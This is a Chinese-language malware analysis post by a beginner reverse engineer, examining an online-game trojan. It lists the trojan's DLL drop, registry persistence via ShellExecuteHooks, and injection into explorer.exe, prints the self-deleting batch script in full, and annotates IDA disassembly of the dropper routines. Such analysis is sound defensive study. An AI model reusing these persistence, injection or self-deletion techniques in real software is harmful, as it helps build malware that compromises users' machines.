【作者声明】: 今年7月份学会汇编,9月份买了《加密与解密3》正式开始学软件安全,这段时间走过来后感慨良多!在新的一年来临之前,发表篇文章纪念一下 ^-^
本文针对病毒源文件和生成的DLL分别作了分析,
一个网游 木马的分析
。病毒有以下的行为:
(1)病毒运行后释放rijxckin.dll到C:\WINDOWS\system32\
(2) 生成注册表项
1.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Game\
JXQY\Url
2.HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-
698745210353}\InprocServe r32\"",
3.HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-
698745210353}\InprocServer32\ThreadingModel,
4.HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explo
rer\ShellExecuteHooks\{35FD6584-698F-BCD2-602C-698745210353},内容
为"rijxckin.dll"
(3)把C:\WINDOWS\system32\rijxzkin.dll文件注入到explorer进程
(4)在临时文件夹里创建bat文件,用来删除病毒自身文件,bat文件的内容如下(其
中C:\a.exe为病毒文件路径):
@echo off
:Loop
del "C:\a.exe"
if exist "C\a.exe" goto Loop
(1)病毒运行后释放rijxckin.dll到C:\WINDOWS\system32\
第一步:查找C:\WINDOWS\system32\路径,看有没有rijxckin.dll文件
Unpacker:004026A8 FindFile proc near ; CODE XREF:
FindBatFileAndDel+8 p
Unpacker:004026A8 ; FindBatFileAndDel+24 p ...
Unpacker:004026A8
Unpacker:004026A8 var_144 = byte ptr -144h
Unpacker:004026A8
Unpacker:004026A8 push ebx
Unpacker:004026A9 add esp, 0FFFFFEC0h
Unpacker:004026AF xor ebx, ebx
Unpacker:004026B1 push esp ; lpFindFileData
Unpacker:004026B2 push eax ; lpFileName
Unpacker:004026B3 call FindFirstFileA
Unpacker:004026B8 cmp eax, 0FFFFFFFFh
Unpacker:004026BB jz short loc_4026C5
Unpacker:004026BD test [esp+144h+var_144], 10h
Unpacker:004026C1 jnz short loc_4026C5
Unpacker:004026C3 mov bl, 1
Unpacker:004026C5
Unpacker:004026C5 loc_4026C5: ; CODE XREF:
FindFile+13 j
Unpacker:004026C5 ; FindFile+19 j
Unpacker:004026C5 push eax ; hFindFile
Unpacker:004026C6 call FindClose
Unpacker:004026CB mov eax, ebx
Unpacker:004026CD add esp, 140h
Unpacker:004026D3 pop ebx
Unpacker:004026D4 retn
Unpacker:004026D4 FindFile endp
第二步:没有的话就从自身文件里释放出rijxckin.dll到C:\WINDOWS\system32\
Unpacker:00402E2C push esi ; lpFileName
Unpacker:00402E2D mov ecx, offset dword_402F00 ;ASCII
"ICO"
Unpacker:00402E32 mov edx, offset aMain ; "MAIN"
Unpacker:00402E37 xor eax, eax ; hModule
Unpacker:00402E39 call CreateDllFile
{
Unpacker:00402AAC CreateDllFile proc near ; CODE XREF:
sub_402E18+21 p
Unpacker:00402AAC
Unpacker:00402AAC NumberOfBytesWritten= dword ptr -4
Unpacker:00402AAC lpFileName = dword ptr 8
Unpacker:00402AAC
Unpacker:00402AAC push ebp
Unpacker:00402AAD mov ebp, esp
Unpacker:00402AAF push ecx
Unpacker:00402AB0 push ebx
Unpacker:00402AB1 push esi
Unpacker:00402AB2 push edi
Unpacker:00402AB3 mov ebx, eax
Unpacker:00402AB5 push ecx ; lpType
Unpacker:00402AB6 push edx ; lpName
Unpacker:00402AB7 push ebx ; hModule
Unpacker:00402AB8 call FindResourceA
Unpacker:00402ABD mov esi, eax
Unpacker:00402ABF push esi ; hResInfo
Unpacker:00402AC0 push ebx ; hModule
Unpacker:00402AC1 call SizeofResource
Unpacker:00402AC6 mov edi, eax ;eax=5e00
Unpacker:00402AC8 push esi ; hResInfo
Unpacker:00402AC9 push ebx ; hModule
Unpacker:00402ACA call LoadResource
Unpacker:00402ACF push eax ; hResData
Unpacker:00402AD0 call LockResource
Unpacker:00402AD5 mov esi, eax
Unpacker:00402AD7 push 0 ; hTemplateFile
Unpacker:00402AD9 push 80h ; dwFlagsAndAttributes
Unpacker:00402ADE push 2 ; dwCreationDisposition
Unpacker:00402AE0 push 0 ; lpSecurityAttributes
Unpacker:00402AE2 push 2 ; dwShareMode
Unpacker:00402AE4 push 40000000h ; dwDesiredAccess
Unpacker:00402AE9 mov eax, [ebp+lpFileName]
Unpacker:00402AEC push eax
;lpFileName="C:\WINDOWS\system32\rijxzkin.dll"
Unpacker:00402AED call CreateFileA
Unpacker:00402AF2 mov ebx, eax
Unpacker:00402AF4 push 0 ; lpOverlapped
Unpacker:00402AF6 lea eax, [ebp+NumberOfBytesWritten]
Unpacker:00402AF9 push eax ; lpNumberOfBytesWritten
Unpacker:00402AFA push edi ; nNumberOfBytesToWrite
文件长度5E00
Unpacker:00402AFB push esi ; lpBuffer ASCII "MZP"
Unpacker:00402AFC push ebx ; hFile
Unpacker:00402AFD call WriteFile_0
Unpacker:00402B02 push ebx ; hObject
Unpacker:00402B03 call CloseHandle
Unpacker:00402B08 mov al, 1
Unpacker:00402B0A pop edi
Unpacker:00402B0B pop esi
Unpacker:00402B0C pop ebx
Unpacker:00402B0D pop ecx
Unpacker:00402B0E pop ebp
Unpacker:00402B0F retn 4
Unpacker:00402B0F CreateDllFile endp
}
(2) 生成注册表项
1.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Game\
JXQY\Url ,内容为00(200h)
2.HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-
698745210353}\InprocServer32\"",
3.HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-
698745210353}\InprocServer32\ThreadingModel,
4.HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explo
rer\ShellExecuteHooks\{35FD6584-698F-BCD2-602C-698745210353},内容
为"rijxckin.dll"
增加注册表的函数是:
Unpacker:00402B14 AddRegKey proc near ; CODE XREF:
sub_402C1C+7F p
Unpacker:00402B14 ; sub_402C1C+D0 p ...
Unpacker:00402B14
Unpacker:00402B14 hKey = dword ptr -4
Unpacker:00402B14 cbData = dword ptr 8
Unpacker:00402B14 lpData = dword ptr 0Ch
Unpacker:00402B14 dwType = dword ptr 10h
Unpacker:00402B14
Unpacker:00402B14 push ebp
Unpacker:00402B15 mov ebp, esp
Unpacker:00402B17 push ecx
Unpacker:00402B18 push ebx
Unpacker:00402B19 mov ebx, ecx
Unpacker:00402B1B lea ecx, [ebp+hKey]
Unpacker:00402B1E push ecx ; phkResult
Unpacker:00402B1F push edx ; lpSubKey
Unpacker:00402B20 push eax ; hKey
Unpacker:00402B21 call RegCreateKeyA
Unpacker:00402B26 mov eax, [ebp+cbData]
Unpacker:00402B29 push eax ; cbData
Unpacker:00402B2A mov eax, [ebp+lpData]
Unpacker:00402B2D push eax ; lpData
Unpacker:00402B2E mov eax, [ebp+dwType]
Unpacker:00402B31 push eax ; dwType
Unpacker:00402B32 push 0 ; Reserved
Unpacker:00402B34 push ebx ; lpValueName
Unpacker:00402B35 mov eax, [ebp+hKey]
Unpacker:00402B38 push eax ; hKey
Unpacker:00402B39 call RegSetValueExA
Unpacker:00402B3E mov ebx, eax
Unpacker:00402B40 mov eax, [ebp+hKey]
Unpacker:00402B43 push eax ; hKey
Unpacker:00402B44 call RegCloseKey_0
Unpacker:00402B49 mov eax, ebx
Unpacker:00402B4B pop ebx
Unpacker:00402B4C pop ecx
Unpacker:00402B4D pop ebp
Unpacker:00402B4E retn 0Ch
Unpacker:00402B4E AddRegKey endp
在4个地方分别调用了这个函数创建键值:
00402A34创建
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Game\JX
QY\Url ,内容为00(200h)
00402C9B创建HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-
698745210353}\InprocServer32\"",
00402CEC创建HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-
698745210353}\InprocServer32\ThreadingModel,
00402D4C创建
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explore
r\ShellExecuteHooks\{35FD6584-698F-BCD2-602C-698745210353},内容
为"rijxckin.dll"
(3)把C:\WINDOWS\system32\rijxzkin.dll文件注入到explorer进程
一共分三步完成
第一步: 获取explorer.exe的句柄
Unpacker:00402510 GetExplorerHandle proc near ; CODE XREF:
sub_402DD8+8 p
Unpacker:00402510
Unpacker:00402510 var_138 = dword ptr -138h
Unpacker:00402510 var_114 = byte ptr -114h
Unpacker:00402510
Unpacker:00402510 push ebx
Unpacker:00402511 push esi
Unpacker:00402512 push edi
Unpacker:00402513 push ebp
Unpacker:00402514 add esp, 0FFFFFED8h
Unpacker:0040251A mov ebx, edx
Unpacker:0040251C mov esi, eax
Unpacker:0040251E xor edi, edi
Unpacker:00402520 xor edx, edx
Unpacker:00402522 mov eax, 2
Unpacker:00402527 call CreateModuleSnapshot ; 创建快照
Unpacker:0040252C mov ebp, eax
Unpacker:0040252E mov [esp+138h+var_138], 128h
Unpacker:00402535 mov edx, esp
Unpacker:00402537 mov eax, ebp
Unpacker:00402539 call FindProcess ; BDS 2005-2006 and
Delphi6-7 Visual Component Library
Unpacker:0040253E jmp short loc_402560
Unpacker:00402540 ; -----------------------------------------------------------------
----------
Unpacker:00402540
Unpacker:00402540 loc_402540: ; CODE XREF:
GetExplorerHandle+58 j
Unpacker:00402540 lea eax, [esp+138h+var_114]
Unpacker:00402544
Unpacker:00402544 loc_402544: ; CODE XREF:
Unpacker:loc_40BA44 j
Unpacker:00402544 ; DATA XREF:
Unpacker:0040BA3F o
Unpacker:00402544 push eax
Unpacker:00402545 push esi
Unpacker:00402546 call lstrcmpi ;比较线程名字是
否"explorer",不是的话通过循环继续获取比较
Unpacker:0040254B test eax, eax
Unpacker:0040254D jnz short loc_402557
Unpacker:0040254F mov edi, [esp+140h+var_138]
Unpacker:00402553 test bl, bl
Unpacker:00402555 jz short loc_40256A
Unpacker:00402557
Unpacker:00402557 loc_402557: ; CODE XREF: GetExplorerHandle+3D j
Unpacker:00402557 mov edx, esp
Unpacker:00402559 mov eax, ebp
Unpacker:0040255B call FindProcessNext ; 获取快照中的下一个
进程名字
Unpacker:00402560
Unpacker:00402560 loc_402560: ; CODE XREF:
GetExplorerHandle+2E j
Unpacker:00402560 cmp eax, 1
Unpacker:00402563 sbb eax, eax
Unpacker:00402565 inc eax
Unpacker:00402566 cmp al, 1
Unpacker:00402568 jz short loc_402540
Unpacker:0040256A
Unpacker:0040256A loc_40256A: ; CODE XREF:
GetExplorerHandle+45 j
Unpacker:0040256A push ebp ; hObject
Unpacker:0040256B call CloseHandle
Unpacker:00402570 mov eax, edi
Unpacker:00402572 add esp, 128h
Unpacker:00402578 pop ebp
Unpacker:00402579 pop edi
Unpacker:0040257A pop esi
Unpacker:0040257B pop ebx
Unpacker:0040257B GetExplorerHandle endp ;
第二步: 检查explorer进程中是否已有rijxzkin.dll文件
Unpacker:00402580 FindDllModule proc near ; CODE XREF:
sub_402DD8+18 p
Unpacker:00402580
Unpacker:00402580 var_234 = dword ptr -234h
Unpacker:00402580 var_220 = dword ptr -220h
Unpacker:00402580 var_214 = byte ptr -214h
Unpacker:00402580 var_114 = byte ptr -114h
Unpacker:00402580
Unpacker:00402580 push ebx
Unpacker:00402581 push esi
Unpacker:00402582 push edi
Unpacker:00402583 push ebp
Unpacker:00402584 add esp, 0FFFFFDDCh
Unpacker:0040258A mov edi, ecx
Unpacker:0040258C mov ebx, edx
Unpacker:0040258E mov esi, eax
Unpacker:00402590 xor ebp, ebp
Unpacker:00402592 test edi, edi
Unpacker:00402594 jz short loc_4025A2
Unpacker:00402596 mov edx, 104h
Unpacker:0040259B mov eax, edi
Unpacker:0040259D call @Windows@ZeroMemory$qqrpvui ;
Windows::ZeroMemory(void *,uint)
Unpacker:004025A2
Unpacker:004025A2 loc_4025A2: ; CODE XREF:
FindDllModule+14 j
Unpacker:004025A2 mov edx, esi
Unpacker:004025A4 mov eax, 8
Unpacker:004025A9 call CreateModuleSnapshot ; 创建快照
Unpacker:004025AE mov esi, eax
Unpacker:004025B0 mov [esp+234h+var_234], 224h
Unpacker:004025B0 ; CODE XREF:
Unpacker:loc_40BAB4 j
Unpacker:004025B7 mov edx, esp
Unpacker:004025B9 mov eax, esi
Unpacker:004025BB call FindModuleFirst ; 查找explorer进程中是
否已有"rijxzkin.dll"
Unpacker:004025C0 cmp eax, 1
Unpacker:004025C3 sbb eax, eax
Unpacker:004025C5 inc eax
Unpacker:004025C6 cmp al, 1
Unpacker:004025C8 jnz short loc_402608
Unpacker:004025CA
Unpacker:004025CA loc_4025CA: ; CODE XREF:
FindDllModule+86 j
Unpacker:004025CA test ebx, ebx
Unpacker:004025CC jz short loc_4025DD
Unpacker:004025CE lea eax, [esp+234h+var_214]
Unpacker:004025D2 push eax
Unpacker:004025D3 push ebx
Unpacker:004025D4 call lstrcmpi
Unpacker:004025D9 test eax, eax
Unpacker:004025DB jnz short loc_4025F5
Unpacker:004025DD
Unpacker:004025DD loc_4025DD: ; CODE XREF:
FindDllModule+4C j
Unpacker:004025DD test edi, edi
Unpacker:004025DF jz short loc_4025EF
Unpacker:004025E1 lea eax, [esp+234h+var_114]
Unpacker:004025E8 push eax
Unpacker:004025E9 push edi
Unpacker:004025EA call lstrcpy
Unpacker:004025EF
Unpacker:004025EF loc_4025EF: ; CODE XREF:
FindDllModule+5F j
Unpacker:004025EF mov ebp, [esp+234h+var_220]
Unpacker:004025F3 jmp short loc_402608
Unpacker:004025F5 ; -----------------------------------------------------------------
----------
Unpacker:004025F5
Unpacker:004025F5 loc_4025F5: ; CODE XREF:
FindDllModule+5B j
Unpacker:004025F5 mov edx, esp
Unpacker:004025F7 mov eax, esi
Unpacker:004025F9 call FindModuleNext ; 继续查找explorer进程
中是否已加载"rijxzkin.dll"
Unpacker:004025FE cmp eax, 1
Unpacker:00402601 sbb eax, eax
Unpacker:00402603 inc eax
Unpacker:00402604 cmp al, 1
Unpacker:00402606 jz short loc_4025CA
Unpacker:00402608
Unpacker:00402608 loc_402608: ; CODE XREF:
FindDllModule+48 j
Unpacker:00402608 ; FindDllModule+73 j
Unpacker:00402608 push esi ; hObject
Unpacker:00402609 call CloseHandle
Unpacker:0040260E mov eax, ebp
Unpacker:00402610 add esp, 224h
Unpacker:00402616 pop ebp
Unpacker:00402617 pop edi
Unpacker:00402618 pop esi
Unpacker:00402619 pop ebx
Unpacker:0040261A retn
Unpacker:0040261A FindDllModule endp